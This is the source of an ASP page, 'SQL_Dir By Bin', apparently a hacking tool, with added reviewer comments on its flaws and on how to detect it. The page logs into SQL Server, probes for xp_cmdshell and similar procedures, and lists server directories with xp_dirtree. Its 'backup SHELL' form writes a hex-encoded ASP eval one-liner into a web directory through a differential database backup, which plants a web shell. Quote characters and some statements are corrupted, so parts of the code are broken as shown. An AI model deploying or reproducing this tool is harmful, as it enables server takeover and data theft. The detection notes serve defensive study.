
web操作mssql数据库asp源码

asp操作mssql数据库的源码。该页面用表单提交的账号连接 MSSQL,检测扩展存储过程,用 xp_dirtree 列目录,并带有通过差异备份向指定路径写文件的“备份SHELL”功能:

<!-- Page title and inline stylesheet. The title text is a fixed string, so it
     can serve as a match target for file-content scans of a web root and for
     response-body inspection. -->
<title>SQL_Dir By Bin</title>
<style id=theStyle>
/* Presentation only; nothing in this stylesheet affects what the script does.
   The scrollbar-* properties and "cursor: hand" are Internet Explorer
   extensions. As published, the font-family values are wrapped in typographic
   quotes, which CSS does not treat as string delimiters. */
BODY {
FONT-SIZE: 9pt;
COLOR: #000000;
background-color: #ffffff;
FONT-FAMILY: “Courier New”;
scrollbar-face-color:#E4E4F3;
scrollbar-highlight-color:#FFFFFF;
scrollbar-3dlight-color:#E4E4F3;
scrollbar-darkshadow-color:#9C9CD3;
scrollbar-shadow-color:#E4E4F3;
scrollbar-arrow-color:#4444B3;
scrollbar-track-color:#EFEFEF;
}
TABLE {
FONT-SIZE: 9pt;
FONT-FAMILY: “Courier New”;
BORDER-COLLAPSE: collapse;
border-width: 1px;
border-top-style: solid;
border-right-style: none;
border-bottom-style: none;
border-left-style: solid;
border-color: #d8d8f0;
}
.tr {
font-family: “Courier New”;
font-size: 9pt;
background-color: #e4e4f3;
text-align: center;
}
.td {
height: 24px;
font-size: 9pt;
background-color: #f9f9fd;
font-family: “Courier New”;
}
input {
font-family: “Courier New”;
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}
textarea {
font-family: “Courier New”;
BORDER-WIDTH: 1px;
FONT-SIZE: 12px;
color: #000000;
}
A:visited {
FONT-SIZE: 9pt;
COLOR: #333333;
FONT-FAMILY: “Courier New”;
TEXT-DECORATION: none;
}
A:active {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: “Courier New”;
TEXT-DECORATION: none;
}
A:link {
FONT-SIZE: 9pt;
COLOR: #000000;
FONT-FAMILY: “Courier New”;
TEXT-DECORATION: none;
}
A:hover {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: “Courier New”;
TEXT-DECORATION: none;
}
tr {
font-family: “Courier New”;
font-size: 9pt;
line-height: 18px;
}
td {
font-size: 9pt;
font-family: “Courier New”;
border-width: 1px;
border-top-style: none;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: none;
border-color: #d8d8f0;
}
.trHead {
font-family: “Courier New”;
height: 2px;
background-color: #e4e4f3;
line-height: 2px;
}

.fixSpan {
overflow: hidden;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
}

.fixTable {
word-break: break-all;
word-wrap: break-word;
}

#fileList span{
width: 120px;
line-height: 23px;
cursor: hand;
overflow: hidden;
padding-left: 5px;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
border: 1px solid #ffffff;
}
</style>
<%if session(“login”)=”" then%>
<%
' Connection form ("database connection" in the heading cell), rendered
' whenever the session holds no "login" value.
' It posts ip, port, user and pass to ?action=login. The defaults are
' localhost, 1433 and sa, and the pass field is type=text, so the password is
' shown in clear on screen.
' NOTE(review): nothing here authenticates the visitor. The only gate on the
' rest of the page is whether the SQL Server credentials typed into this form
' open a connection, so access control for this file depends entirely on who
' can reach its URL.
Echo “<body onload=document.formx.pass.focus();>”
Echo “<table width=816 align=center>”
Echo “<form method=post name=formx action=’?action=login’>”
Echo “<tr>”
Echo “<td align=center class=td>数 据 库 连 接</td>”
Echo “</tr>”
Echo “<tr>”
Echo “<td height=75 align=center>”
Echo “IP:<input name=ip type=text style=’border:1px solid #d8d8f0;background-color:#ffffff;’ value=localhost> ”
Echo “PORT:<input name=port type=text style=’border:1px solid #d8d8f0;background-color:#ffffff;’ value=1433> ”
Echo “USER:<input name=user type=text style=’border:1px solid #d8d8f0;background-color:#ffffff;’ value=sa> ”
Echo “PASS:<input name=pass type=text style=’border:1px solid #d8d8f0;background-color:#ffffff;’> ”
Echo “</td>”
Echo “</tr>”
Echo “<tr>”
Echo “<td align=center class=td><input type=submit value=LOGIN style=’border:1px solid #d8d8f0;background-color:#f9f9fd;’></td>”
Echo “</tr>”
Echo “<tr>”
Echo “<td align=center class=td>2007 @ SQL_DIR By Bin <br><a href= http://www.rootkit.net.cn target=_blank>www.rootkit.net.cn</a></td>”
Echo “</tr>”
Echo “</form>”
Echo “</table>”
Echo “</body>”

%>

<%End If %>
<%
' Handler for ?action=login: tries to open an OLE DB connection to SQL Server
' with the posted values and, if that succeeds, marks the session as logged in.
' NOTE(review): ip and port are caller-controlled, so the web server itself
' originates the SQL login to whatever endpoint is named. Egress filtering
' from the web tier to database ports limits what this can reach.
If request(“action”)=”login” Then
' Data Source is built as "<ip>,<port>" straight from the form. The author's
' trailing notes on the next four lines read: connection IP (use (local) for a
' local server, the IP for a remote one); user name; user password; database
' name.
SqlLocalName =”"&request.Form(“ip”)&”,”&request.Form(“port”)&”" ‘连接IP [ 本地用 (local) 外地用IP ]
SqlUserName =”"&request.Form(“user”)&”" ‘用户名
SqlPassword =”"&request.Form(“pass”)&”" ‘用户密码
‘SqlDatabaseName=”sql” ‘数据库名
' The form values are concatenated into the connection string unescaped, so a
' value containing ";" can add further connection-string keywords.
' SqlDatabaseName is only mentioned on the line above, which appears to be
' commented out, so Initial Catalog is left empty here.
ConnStr = “Provider=Sqloledb;User ID=” & SqlUserName & “; Password=” & SqlPassword & “; Initial CataLog = ” & SqlDatabaseName & “; Data Source=” & SqlLocalName & “;”
SqlNowString=”GetDate()”
' Errors are suppressed from here on (author's note: "fault tolerance").
On Error Resume Next ‘ 容错
Set Conn=Server.CreateObject(“ADODB.Connection”)
Conn.open ConnStr
' -2147467259 (0x80004005) is reported as "host IP or port connection error"
' and -2147217843 (0x80040E4D) as "wrong user name or password"; both alerts
' send the browser back one page. Any other error code gets no message.
If Err.number=-2147467259 Then
Echo “<script language=’javascript’> alert(‘主机IP或者端口连接错误,请检查!’);history.back(); </script>”
ElseIf Err.number=-2147217843 Then
Echo “<script language=’javascript’> alert(‘用户名或者密码错误,请检查!’);history.back(); </script>”
End If
' On success the SQL credentials and target are kept in session variables in
' clear text; the tools and dir actions rebuild their connections from them.
If Err.number=0 Then
session(“login”)=”yes”
session(“user”)=request.Form(“user”)
session(“pass”)=request.Form(“pass”)
session(“ip”)=request.Form(“ip”)
session(“port”)=request.Form(“port”)
End If
' The redirect to ?action=tools is issued whether or not the connection opened.
response.redirect”?action=tools”
End If
%>

<%
' ?action=tools (also the default when no action is given) is served only to
' sessions whose "login" value is "yes".

If request(“action”)=”tools” or request(“action”)=”" Then

If session(“login”)=”yes” Then
%>
<%
rem—————————-数据库连接—————–
' Banner above reads "database connection". The connection string is rebuilt
' on every request from the user, pass, ip and port values cached in the
' session, again by plain concatenation.
ConnStr = “Provider=Sqloledb.1;User ID=” &session(“user”)& “; Password=” &session(“pass”)& “; Initial CataLog = ” & SqlDatabaseName & “; Data Source=” & session(“ip”) & “,”&session(“port”)&”;”
Set Conn=Server.CreateObject(“ADODB.Connection”)
Conn.open ConnStr
' An ADOX.Catalog is opened on the same connection string; its Tables
' collection is enumerated when the page body is written.
Set Cat = Server.CreateObject(“ADOX.Catalog”)
Cat.ActiveConnection = conn.ConnectionString
rem————————函数————-
Sub Echo(sStr)
    ' Thin output helper: sends sStr to the HTTP response exactly as given.
    ' No HTML encoding is applied, so callers are responsible for escaping.
    Call Response.Write(sStr)
End Sub

Function IIf(var, val1, val2)
    ' Inline-if helper: yields val1 when var compares equal to True,
    ' otherwise val2. The comparison is "var = True", so a non-Boolean
    ' truthy value such as 1 selects val2.
    If var = True Then
        IIf = val1
    Else
        IIf = val2
    End If
End Function
' Author banner, followed by request and server facts that the summary table
' prints later: web root, physical path of this script, host name, local IP,
' port, OS and server software, script engine version, script URL.
' NOTE(review): these values disclose the web root path and software versions
' to whoever holds a logged-in session on this page.
const copyright = “Code By Bin<br><a href = http://www.rootkit.net.cn target=_blank>www.rootkit.net.cn</a>”
RootPath = Server.MapPath(“/”)
Path=Request.ServerVariables(“PATH_TRANSLATED”)
Server_Name=Request.ServerVariables(“SERVER_NAME”)
IP=Request.ServerVariables(“LOCAL_ADDR”)
PORT=Request.ServerVariables(“SERVER_PORT”)
OS= Request.ServerVariables(“OS”)
' OS falls back to the literal "Windows2003" when the OS server variable is
' empty; SERVER_SOFTWARE and the script engine version are then appended.
OS= IIf(OS = “”, “Windows2003″, OS) & “, ” & Request.ServerVariables(“SERVER_SOFTWARE”)
OS= OS & “, ” & ScriptEngine & “/” & ScriptEngineMajorVersion & “.” &ScriptEngineMinorVersion & “.” & ScriptEngineBuildVersion
Curl=Request.ServerVariables(“SCRIPT_NAME”)
RequestUrl=Request.ServerVariables(“Url”)
' URL is assembled from the host name and request path with a fixed http scheme.
URL=”http://“&Server_Name&Requesturl

rem————————————–

rem———————–数据库操作——————–
' Banner above reads "database operations". Reads the server version, the
' result of db_name(0) and the current database user.
Set rs = conn.execute(“select @@version”)
SQLversion=rs(0)
Set rs = Conn.execute(“select db_name(0)”)
DBname=rs(0)
Set rs = Conn.execute(“select user”)
DBuser=rs(0)
‘权限判断
' Privilege check (the author's note above). NOTE(review): the "sa" value set
' for a sysadmin login is always overwritten by the db_owner test that
' follows, because its Else branch assigns "public"; dbo therefore ends up as
' "db_owner" or "public".
Set rs = Conn.execute(“Select IS_SRVROLEMEMBER(’sysadmin’)”)
If rs(0)=1 Then
dbo=”sa”
End If
Set rs = Conn.execute(“Select IS_MEMBER(‘db_owner’)”)
If rs(0)=1 Then
dbo=”db_owner”
Else
dbo=”public”
End If
‘扩展判断
' Extended-procedure check (the author's note above). For each name the code
' counts rows in master.dbo.sysobjects with xtype='X' and stores a tick or
' cross label. Names probed, in order: xp_cmdshell, sp_oacreate, xp_regwrite,
' xp_servicecontrol, xp_regread, sp_oamethod, XP_dirtree.
' NOTE(review): this run of seven sysobjects lookups arriving from a web
' application login is a recognisable sequence in a SQL trace or audit log.
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_cmdshell’”)
If rs(0)=1 Then
xp_cmdshell=”XP_cmdshell √”
Else
xp_cmdshell=”XP_cmdshell ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’sp_oacreate’”)
If rs(0)=1 Then
sp_oacreate=”SP_oacreate √”
Else
sp_oacreate=”SP_oacreate ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_regwrite’”)
If rs(0)=1 Then
xp_regwrite=”XP_regwrite √”
Else
xp_regwrite=”XP_regwrite ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_servicecontrol’”)
If rs(0)=1 Then
xp_servicecontrol=”XP_servicecontrol √”
Else
xp_servicecontrol=”XP_servicecontrol ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_regread’”)
If rs(0)=1 Then
xp_regread=”XP_regread √”
Else
xp_regread=”XP_regread ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’sp_oamethod’”)
If rs(0)=1 Then
sp_oamethod=”SP_oamethod √”
Else
sp_oamethod=”SP_oamethod ×”
End If
' XP_dirtree is the procedure the directory listing depends on; when it is
' missing the label adds "(this program probably cannot be used)".
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’XP_dirtree’”)
If rs(0)=1 Then
XP_dirtree=”XP_dirtree √”
Else
XP_dirtree=”XP_dirtree × (貌似不能使用该程序)”
End If
rem——————–操作检测——————-
' Banner above reads "operation check". Every step below runs with errors
' suppressed and only records a success or failure label for display.
' NOTE(review): Err is not cleared between steps in the visible code, so one
' failure is likely to make each later "If Err" test read as failed too.
On Error Resume Next
' Try to switch to the pubs sample database.
Set Rs = Conn.Execute(“USE pubs”)
If Err Then
cbase=”无法切换到PUBS数据库!”
Else
cbase=”切换到PUBS数据库!”
End If
' Drop any bin_dir table left over from an earlier request.
Set rs = Conn.execute(“drop table [bin_dir]“)
If Err Then
drop=”删除表失败!”
Else
drop=”删除表成功!”
End If
' Recreate bin_dir and fill it from master..XP_dirtree for c: with arguments
' 1,1. The table is created in whichever database is current after the USE
' attempt, so a bin_dir table with DirName, DirAtt and DirFile columns is an
' artifact this page leaves behind.
Set rs = Conn.execute(“Create TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) Insert bin_dir EXEC MASTER..XP_dirtree ‘c:’,1,1″)
If Err Then
create=”建表失败!”
Else
create=”建表成功!”
End If
' Row-count probe used to choose the final label. The statement text on the
' next line is distinctive as published and can be matched verbatim when
' searching SQL traces.
Set rs = Conn.execute(“select conunt(*) from bin_dir”)
If rs(0)>1 Then
xp=”扩展执行成功! <FONT COLOR=RED><STRONG>GOOD LUCK!</STRONG></FONT>”
Else
xp=”扩展执行失败! SOORY!”
End If
rem————————————————–
Sub SQLdbname()
' Prints database names by calling db_name() with increasing ids and stops at
' the first result that does not compare as non-empty, or after 100 ids.
' a is not initialised in this Sub; assuming no outer variable of that name,
' VBScript treats it as 0 in a=a+1, so the first id queried is 1.
' Names are written to the response without HTML encoding.
l=100
For i=1 To l
a=a+1
Set rs = conn.execute(“select db_name(“&a&”)”)
If rs(0)<>”" then
Echo “”&rs(0)&” ”
Else
Exit For
End If
Next
End Sub
rem———————————–数据显示———————
Sub showdata()
' Renders the contents of bin_dir as HTML table rows: one header row of column
' names, then one row per record in which every cell links to
' ?action=dir&path=<dir_path><value>.
' NOTE(review): field names and values are written into attribute and element
' content without Server.HTMLEncode, so names returned by the directory
' listing reach the browser as markup.
' NOTE(review): dir_path is not assigned in this Sub; presumably it is the
' script-level value set by the dir action. Confirm against the caller.
set rs2=server.CreateObject(“adodb.recordset”)
' Cursor type 1 and lock type 1 correspond to adOpenKeyset and adLockReadOnly.
rs2.open “select * from bin_dir order by dirfile”,conn,1,1

Echo “<tr>”
For j = 0 To rs2.Fields.Count – 1
Echo “<td height=22 class=td width=500><span class=fixSpan title=’” & rs2.Fields(j).Name & “‘ style=’width:125px;padding-left:5px;’>” & rs2.Fields(j).Name & “</span></td>”
Next
Echo “</tr>”
Echo “<tr>”
' The outer bound is 0 To recordcount, which is one pass more than the number
' of records.
For i = 0 To rs2.recordcount
For j = 0 To rs2.Fields.Count – 1
Echo “<td height=22 class=td width=500><span class=fixSpan style=’width:250px;padding-left:5px;’><a href=’?action=dir&path=”&dir_path&”"&rs2(j)&”‘>” &rs2(j)& “</a></span></td>”
Next
' An opening <tr> is written after each record; no closing </tr> is emitted.
Echo “<tr>”
RS2.MoveNext
Next
End Sub
rem—————————————————–
rem———————————–删除表———————
Sub droptable()
' Drops the bin_dir working table. No call to this Sub appears in the code
' visible on this page, so the table is only removed by the inline drop
' statements that run before each re-creation.
Set rs = Conn.execute(“drop table [bin_dir]“)
End Sub
rem—————————————————–

' Page body for the tools view. The left column lists every table name from
' Cat.Tables; the right column prints the facts gathered earlier in the page.
' NOTE(review): every value below is concatenated into the HTML without
' encoding, including table names and the SQL Server version string.
Echo “<table style=’TABLE-LAYOUT: fixed; WORD-BREAK: break-all’>”
Echo “<tr>”
Echo”<td width=20% valign=top>”
For Each objTable In Cat.Tables
Echo “<span class=fixSpan title=’” & objTable.Name & “‘ ”
Echo “style=’width:90%;padding-left:8px;cursor:hand;’>” & objTable.Name & “</span>”
Next
Echo “</td>”
Echo “<td valign=top>”
Echo “<table>”
' Header row: "Item" / "Value".
Echo “<tr class=td>”
Echo “<td width=’100′> 项目</td>”
Echo “<td width=’400′> 值</td>”
Echo “</tr>”
' Row: current time.
Echo “<tr class=td>”
Echo “<td> 当前时间</td>”
Echo “<td> “&FormatDateTime(Now(), 0)&”</td>”
Echo “</tr>”
' Row: server address (name, IP, port).
Echo “<tr class=td>”
Echo “<td> 服务器地址</td>”
Echo “<td> 名称: “&SERVER_NAME&”(IP:”&IP&”) 端口:”&PORT&”</td>”
Echo “</tr>”
' Row: software environment.
Echo “<tr class=td>”
Echo “<td> 软件环境</td>”
Echo “<td> “&OS&”</td>”
Echo “</tr>”
' Row: site directory (web root).
Echo “<tr class=td>”
Echo “<td> 站点目录</td>”
Echo “<td> “&rootpath&”</td>”
Echo “</tr>”
' Row: current path and URL of this script.
Echo “<tr class=td>”
Echo “<td> 当前路径</td>”
Echo “<td> Path: ” &path& “<br /> URL : “&URL&”</td>”
Echo “</tr>”
' Row: SQL Server version.
Echo “<tr class=td>”
Echo “<td> SQL版本</td>”
Echo “<td> “&sqlversion&”</td>”
Echo “</tr>”
' Row: all databases, printed by SQLdbname.
Echo “<tr class=td>”
Echo “<td> SQL所有库</td>”
Echo “<td> ”
sqldbname()
Echo “</td>”
Echo “</tr>”
' Row: current database check. NOTE(review): the "user name" label is followed
' by dbname and the "database" label by dbuser, so the two values appear
' swapped relative to their labels.
Echo “<tr class=td>”
Echo “<td> 当前库检测</td>”
Echo “<td> 用户名:”&dbname&” 数据库:”&dbuser&” 权限:”&dbo&”</td>”
Echo “</tr>”
' Row: extended-procedure check labels.
Echo “<tr class=td>”
Echo “<td> 扩展检测</td>”
Echo “<td> “&xp_cmdshell&” “&sp_oacreate&” “&xp_regwrite&” “&xp_servicecontrol&” “&sp_oamethod&”<br> “&xp_regread&” “&XP_dirtree&”</td>”
Echo “</tr>”
' Row: operation check labels.
Echo “<tr class=td>”
Echo “<td> 操作检测</td>”
Echo “<td> “&cbase&” “&create&” “&drop&” “&xp&”</td>”
Echo “</tr>”
Echo “</table>”
' "List directory" form: posts a path (default c:) to ?action=dir. The markup
' contains a stray closing tag spelled "from" before the real form close.
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’115′> 列目录</td>”
Echo “<form method=post name=form2 action=’?action=dir’>”
Echo “<td width=’700′> <INPUT TYPE=text NAME=path size=70 value=’c:’> <INPUT TYPE=submit value=查询></from></td>”
Echo “</form>”
Echo “</tr>”
Echo “</table>”
Echo “</td>”
Echo “</tr>”
Echo “</table>”
Echo “<p>”
' NOTE(review): the next line looks altered by HTML-entity rendering of the
' published page; presumably it concatenated the copyright constant. Confirm
' against an original copy.
Echo “<center>”?right&”</center>”
End If
' Author's note on the next line: end of the tools feature.
End If ‘tools功能结束%>

<%
' ?action=dir: directory listing plus the feature the page labels "backup
' SHELL". As with the tools view, the only gate is session("login").
If request(“action”)=”dir” Then
If session(“login”)=”yes” Then

On Error Resume Next
rem—————————-数据库连接—————–
' Banner above reads "database connection"; the connection is rebuilt from the
' credentials cached in the session.
ConnStr = “Provider=Sqloledb.1;User ID=” &session(“user”)& “; Password=” &session(“pass”)& “; Initial CataLog = ” & SqlDatabaseName & “; Data Source=” & session(“ip”) & “,”&session(“port”)&”;”
Set Conn=Server.CreateObject(“ADODB.Connection”)
Conn.open ConnStr
Set Cat = Server.CreateObject(“ADOX.Catalog”)
Cat.ActiveConnection = conn.ConnectionString
rem————————函数————-
rem——————–操作检测——————-
' Banners above read "functions" and "operation check".

On Error Resume Next
' bak and path are read with Request(...), which is not limited to the posted
' form. The Replace arguments are garbled in the published text, so the exact
' substitution cannot be determined from this page.
bak_path=Replace(Request(“bak”),”\”,”")
dir_path=Replace(Request(“path”),”\”,”")
If bak_path<>”" Then
' When bak is supplied, dir_path becomes bak_path with "bin.asp" removed.
dir_path=Replace(bak_path,”bin.asp”,”")
' File-write sequence: create a scratch table bin_cmd with one image column,
' back up the current database to the device named by the hex literal, insert
' a hex-encoded blob into bin_cmd, back up again WITH DIFFERENTIAL,FORMAT to
' the request-supplied bak path, then drop the scratch table. The blob decodes
' to a one-line ASP fragment that evaluates a request parameter.
' NOTE(review): bak_path is spliced into the T-SQL text unescaped and decides
' where the SQL Server service account writes the backup file.
' Detection: BACKUP DATABASE ... WITH DIFFERENTIAL issued by a web application
' login; backup history in msdb (backupset / backupmediafamily) whose
' physical_device_name has a script extension or sits under a web root; a
' short-lived bin_cmd table.
' Mitigation: the application login should not hold backup rights (db_owner or
' db_backupoperator), and the SQL Server service account should have no write
' access to directories served by the web server.
Set Rs = Conn.Execute(“create table [bin_cmd] ([cmd] [image])”)
Set Rs = Conn.Execute(“declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X620069006E00 backup database @a to disk = @s;”)
Set Rs = Conn.Execute(“insert into [bin_cmd](cmd) values(0×3C25657865637574652872657175657374282242222929253E);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=’”&bak_path&”‘ backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT”)
Set Rs = Conn.Execute(“drop table [bin_cmd]“)
end if
' Same working-table sequence as the tools view (switch to pubs, drop and
' recreate bin_dir, fill it from XP_dirtree, probe the row count), still
' running with errors suppressed.
Set Rs = Conn.Execute(“USE pubs”)
If Err Then
cbase=”无法切换到PUBS数据库!”
Else
cbase=”切换到PUBS数据库!”
End If
Set rs = Conn.execute(“drop table [bin_dir]“)
If Err Then
drop=”删除表失败!”
Else
drop=”删除表成功!”
End If
' Here the directory passed to MASTER..XP_dirtree is the request-supplied
' dir_path, concatenated into the statement text.
' NOTE(review): a quote character in dir_path ends the string literal early,
' so the request parameter can change the T-SQL that is executed. XP_dirtree
' calls made by a web application login are worth alerting on in their own
' right.
Set rs = Conn.execute(“Create TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) Insert bin_dir EXEC MASTER..XP_dirtree ‘”&dir_path&”‘,1,1″)
If Err Then
create=”建表失败!”
Else
create=”建表成功!”
End If
' Row-count probe; the statement text is distinctive as published and can be
' matched verbatim when searching SQL traces.
Set rs = Conn.execute(“select conunt(*) from bin_dir”)
If rs(0)>1 Then
xp=”扩展执行成功! <FONT COLOR=RED><STRONG>GOOD LUCK!</STRONG></FONT>”
Else
xp=”扩展执行失败! SOORY!”
End If
rem——————
' Page body for the dir view: table names on the left, then the operation
' labels, the "backup SHELL" form, the "list directory" form and the listing.
' NOTE(review): dir_path comes from the request and is written into the value
' attributes of both forms without encoding, so it is reflected into the page
' as markup.
Echo “<table style=’TABLE-LAYOUT: fixed; WORD-BREAK: break-all’>”
Echo “<tr>”
Echo”<td width=20% valign=top>”
For Each objTable In Cat.Tables
Echo “<span class=fixSpan title=’” & objTable.Name & “‘ ”
Echo “style=’width:90%;padding-left:8px;cursor:hand;’>” & objTable.Name & “</span>”
Next
Echo “</td>”
Echo “<td valign=top>”
Echo “<table>”
' Row: operation check labels.
Echo “<tr class=td>”
Echo “<td width=’103′> 操作检测</td>”
Echo “<td width=’700′> “&cbase&” “&create&” “&drop&” “&xp&”</td>”
Echo “</tr>”
Echo “</table>”
' "Backup SHELL" form: posts bak to ?action=dir, pre-filled with the current
' dir_path followed by bin.asp. A file of that name appearing in a listed
' directory is an indicator worth searching for.
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’115′> 备份SHELL</td>”
Echo “<form method=post name=formt action=’?action=dir’>”
Echo “<td width=’700′> <INPUT TYPE=text NAME=bak size=70 value=’”&dir_path&”bin.asp’> <INPUT TYPE=submit value=备份></td></form>”
Echo “</tr>”
Echo “</table>”
' "List directory" form with a query button and an exit button that navigates
' to ?action=logout.
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’121′> 列目录</td>”
Echo “<form method=post name=form2 action=’?action=dir’>”
Echo “<td width=’700′> <INPUT TYPE=text NAME=path size=70 value=’”&dir_path&”‘> <INPUT TYPE=submit value=查询><input type = button value=退出 onclick= location.href(‘?action=logout’)></td></form>”
Echo “</tr>”
Echo “</table>”
Echo “<table>”

' Writes the bin_dir rows as links back into ?action=dir.
showdata()

Echo “</table>”
Echo “</td>”
Echo “</tr>”
Echo “</table>”
Echo “<p>”
' NOTE(review): the next line looks altered by HTML-entity rendering of the
' published page; presumably it concatenated the copyright constant. Confirm
' against an original copy.
Echo “<center>”?right&”</center>”
End If
End If
%>
<% If Request(“action”)=”logout” Then
' Logout only blanks session("login"). The user, pass, ip and port values
' stored at login are not cleared here, so the SQL credentials remain in the
' session after the visitor is sent back to ?action=login.
Session(“login”) = “”
Response.Redirect”?action=login”
end if
%>
